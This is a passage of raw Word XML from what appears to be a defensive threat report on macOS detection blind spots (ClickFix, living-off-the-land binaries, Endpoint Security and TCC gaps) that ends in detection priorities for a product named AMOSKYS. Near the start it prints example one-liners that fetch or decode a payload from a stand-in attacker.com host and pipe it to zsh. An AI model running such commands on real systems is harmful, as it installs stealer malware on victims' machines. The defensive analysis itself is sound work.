      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s https://attacker.com/payload.sh | zsh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'base64_encoded_payload' | base64 -d | zsh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">eval "$(curl -s https://attacker.com/obfuscated.sh)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The command downloads and executes a shell script that installs the stealer payload. Because the user manually initiated the Terminal session and pasted the command, this is classified as user-initiated execution. EDR tools that monitor process creation see bash or zsh spawning curl, which is legitimate behavior in developer workflows. The social engineering context — that the user was tricked into pasting — is invisible to the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why This Is Nearly Undetectable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Clipboard is invisible: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NSPasteboard API calls generate no Endpoint Security events. There is no ES event type for clipboard read or write operations. A security tool cannot see that a webpage wrote a command to the clipboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal execution is legitimate: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Developers paste commands into Terminal hundreds of times daily. curl | sh is a standard installation pattern for Homebrew, Rust, nvm, and countless development tools. No static rule can distinguish malicious from legitimate use without understanding the source context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No cross-app correlation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The security tool would need to connect: user visited webpage in Safari → JavaScript wrote to clipboard → user opened Terminal → pasted content matches clipboard write → curl connects to the same domain as the webpage. No current tool performs this correlation on macOS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Living-off-the-Land on macOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">84% of high-severity cyberattacks in 2025 exploited legitimate system tools. On macOS, the LotL toolkit centers on a small set of built-in binaries that every stealer and APT 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3200"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>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Binary</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Legitimate Use</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Malicious Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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ATT&amp;CK ID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osascript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macOS automation, Shortcuts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Fake password dialogs, credential harvesting, file manipulation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T1059.002</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curl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Download files, API testing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Payload download, C2 communication, data exfiltration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T1105</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security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Keychain management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Extract stored passwords (-wa flag), dump certificates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T1555.001</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ditto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File copy with metadata</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Archive stolen data for exfiltration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T1560.001</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xattr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Extended attribute management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Remove quarantine flag to bypass Gatekeeper</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T1553.001</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bash/zsh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Shell scripting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Post-exploitation automation, payload execution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T1059.004</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Launch applications/URLs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 malicious files bypassing GUI protections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T1204.002</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sysctl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 configuration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VM detection, environment fingerprinting</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T1082</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dscl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Directory Services management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enumeration, account manipulation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T1087.001</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launchctl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Service management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Install persistence via LaunchAgents/Daemons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T1543.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The fundamental detection challenge is that behavioral rules for these binaries generate catastrophic false positive rates. One study found 99.7% false positive rates in industrial environments when monitoring legitimate system tools for suspicious behavior. The only viable approach is contextual behavioral baselining — learning what is normal for each user and device, then detecting deviations. This requires ML models trained on macOS-specific telemetry, which currently does not exist at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2: Where Blind Spots Structurally Originate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The macOS security blind spots are not implementation failures by Apple or by EDR vendors. They are architectural consequences of design decisions that prioritize stability, privacy, and user experience. Understanding why they exist is essential to designing detection strategies that work within these constraints rather than fighting them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 The Endpoint Security Framework Constraint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When Apple deprecated kernel extensions (kexts) starting in macOS 10.15 Catalina, all third-party security tools were forced into user-space System Extensions using the Endpoint Security (ES) Framework. This was good for OS stability but eliminated kernel-level visibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Silent Event Drops</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The ES Framework client has an internal event queue with undocumented capacity limits. When the queue fills — which happens during high-activity periods like large file operations, process creation bursts, or even legitimate build processes — events are silently dropped. There is no error callback, no log entry, no exception. The kernel attaches sequence numbers to events, so a security tool can detect gaps by monitoring sequence continuity. But this only tells you events were lost, not which events were lost. An attacker can deliberately trigger high system activity (a simple fork bomb or recursive file creation) to cause event drops that mask their actual attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The PPID Attribution Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a process is spawned via XPC (the standard macOS inter-process communication mechanism), the reported Parent Process ID does not point to the actual parent application. Instead, it points to launchd (PID 1) or runningboardd. This means a security tool observing process creation cannot reliably determine which application initiated the process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: Chrome spawns a download helper via XPC. The helper executes a malicious binary. The ES event reports the malicious binary’s parent as launchd, not Chrome. The behavioral correlation that would flag “browser spawned suspicious executable” is broken. Tools like TrueTree and launchdXPC attempted to solve this but failed with the introduction of runningboardd in newer macOS versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What the ES Framework Cannot See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Invisible Activity</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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Technical Reason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AppleScript content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stealer attack vector uses osascript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Script is interpreted in-process; no syscall exposes source code to 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NSPasteboard clipboard operations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ClickFix attacks write commands to clipboard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Clipboard is an AppKit API; no kernel-level hook exists in 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Keychain item content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Stealers extract all stored passwords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SecItemCopyMatching is a Security framework API, not a file read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Internal process memory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Stealers operate entirely in-memory</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 monitors system calls, not memory content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XPC message content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Malware communicates via XPC to evade process monitoring</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XPC messages are structured data, not files or processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 The AppleScript Inspection Gap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows provides AMSI (Antimalware Scan Interface), which allows security tools to inspect PowerShell, VBScript, JScript, and other script content before execution. macOS has no equivalent for AppleScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When osascript runs, the ES Framework fires ES_EVENT_TYPE_NOTIFY_EXEC with the process path (/usr/bin/osascript) and command-line arguments. However, inline scripts passed via -e are frequently truncated in the event data. Even when full arguments are captured, they only contain the top-level script text. Scripts that load additional code from files, use osascript -l JavaScript for JXA (JavaScript for Automation), or leverage AppleScript libraries are invisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The partial workaround discovered by security researcher pberba (AEMonitor, February 2026) is to subscribe to the com.apple.appleevents subsystem in Unified Logs at debug level. When configured with persistent debug logging, this subsystem exposes the Apple Events that osascript sends to other applications — the actual IPC operations. This provides behavioral visibility (what the script did) even though content visibility (what the script says) remains limited. However, enabling debug-level persistent logging for this subsystem generates substantial log volume and requires the security tool to process Unified Log data in real time, which most current tools do not do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 The Unified Log Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The macOS Unified Log is simultaneously the most comprehensive and least usable security telemetry source on the platform. It stores all system logs in compressed binary .tracev3 format that cannot be processed with standard Unix tools (no grep, sed, or awk). Reading requires the log CLI tool or Apple’s OSLog API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The log generates 18–50 million entries per day. There is no standardized schema for security events — different subsystems log in different formats. Critical security data like TCC decisions, Keychain access, and AppleScript operations are scattered across dozens of subsystems with no correlation mechanism. Privacy-first design means that starting with macOS 26 Tahoe, NSLog entries are private/redacted by default, and accessing sensitive fields requires special Apple-signed entitlements that third-party developers cannot obtain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The practical consequence is that the Unified Log contains enormous security value that is nearly inaccessible. A security tool must subscribe to specific subsystems, parse binary data in real time, maintain its own correlation engine, and handle volume at scale — all from user space. This is why most EDR vendors rely exclusively on the ES Framework and ignore Unified Logs entirely, missing the AppleScript visibility that AEMonitor demonstrates is technically possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 The TCC Bypass Cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Transparency, Consent, and Control (TCC) is macOS’s permission system that governs access to sensitive resources: camera, microphone, screen recording, Full Disk Access, contacts, and more. The TCC database is stored at two locations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/Library/Application Support/com.apple.TCC/TCC.db  (system-wide, SIP-protected)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Library/Application Support/com.apple.TCC/TCC.db  (per-user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Between 2020 and 2025, at least 11 CVEs documented TCC bypass vulnerabilities. The pattern is consistent: researchers find a way to grant TCC permissions without user consent, Apple patches it, and new bypasses emerge. Notable examples include CVE-2025-43530 (AppleEvent injection to override consent requirements), CVE-2025-31199 (Spotlight plugin abuse to access Apple Intelligence data without TCC prompt), and CVE-2025-8672 (GIMP’s bundled Python interpreter inheriting the application’s TCC permissions). The recurring pattern of bundled interpreter inheritance means that any application with broad TCC permissions that bundles a scripting runtime (Python, Ruby, Perl, Node) creates a TCC bypass vector. This is an architectural pattern, not a one-time bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3: What AMOSKYS Must See</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on the kill chain analysis and blind spot mapping, these are the specific detection capabilities AMOSKYS must implement to provide coverage that no existing tool delivers. Each capability maps to a specific stage in the attack chains documented above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Priority 1: AppleScript Behavioral Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every macOS stealer uses osascript for credential harvesting. This is the single highest-impact detection capability. The implementation path uses the AEMonitor approach: subscribe to com.apple.appleevents Unified Log subsystem at debug level, stream and parse Apple Events in real time, detect behavioral patterns associated with credential theft (display dialog with hidden answer, file operations on sensitive paths, clipboard manipulation), and correlate with ES_EVENT_TYPE_NOTIFY_EXEC to link the osascript process to its behavioral impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This does not provide AMSI-equivalent content inspection, but it provides behavioral equivalence: seeing what the script does rather than what it says. Combined with argument inspection from ES EXEC events, this covers the vast majority of stealer credential harvesting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Priority 2: Cross-Application Link Provenance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The ability to trace a link from its delivery channel through browser navigation to endpoint compromise is AMOSKYS’s most differentiating capability. No current tool does this. Implementation requires monitoring ES_EVENT_TYPE_NOTIFY_EXEC when Safari or Chrome launches with a URL argument, correlating the browser launch with the process that triggered it (Messages, Teams, Slack) through ES_EVENT_TYPE_NOTIFY_XPC_CONNECT, tracking ES_EVENT_TYPE_NOTIFY_CREATE for any files downloaded during the browser session, and connecting the download to any subsequent ES_EVENT_TYPE_NOTIFY_EXEC of the downloaded file. The result is a complete provenance chain: link received in iMessage → Safari opened → .dmg downloaded → .app executed → osascript launched → credentials exfiltrated. This chain makes each individual event dramatically more suspicious than it appears in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Priority 3: Outgoing Connection Behavioral Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apple’s built-in firewall only blocks incoming connections. LuLu (Objective-See) provides outgoing connection blocking but uses simple allow/block rules. AMOSKYS must implement behavioral C2 detection using ES_EVENT_TYPE_NOTIFY_SOCKET_CONNECT: connection beaconing analysis (regularity of interval, jitter patterns), TLS fingerprinting (JA3/JA4 hashes for unusual client signatures), process context correlation (unsigned binary connecting to never-before-seen domain), temporal anomaly detection (connections at unusual times from unusual processes), and exfiltration volume monitoring (large POST requests from non-browser processes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Priority 4: Persistence Monitoring with Behavioral Baselines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS persistence locations include LaunchAgents, LaunchDaemons, login items, cron jobs, zshrc/bashrc modifications, and Authorization Plugins. Current tools monitor these locations for changes. AMOSKYS must go further by establishing behavioral baselines for each device: what persistence items are normal, what modification patterns are expected (Homebrew updates, application installations), and what deviates from the baseline. A new LaunchAgent installed at 2 AM by an unsigned binary that was downloaded from a never-before-seen domain is qualitatively different from a LaunchAgent updated by a signed Homebrew formula during a routine brew upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Priority 5: Gatekeeper and Quarantine Integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
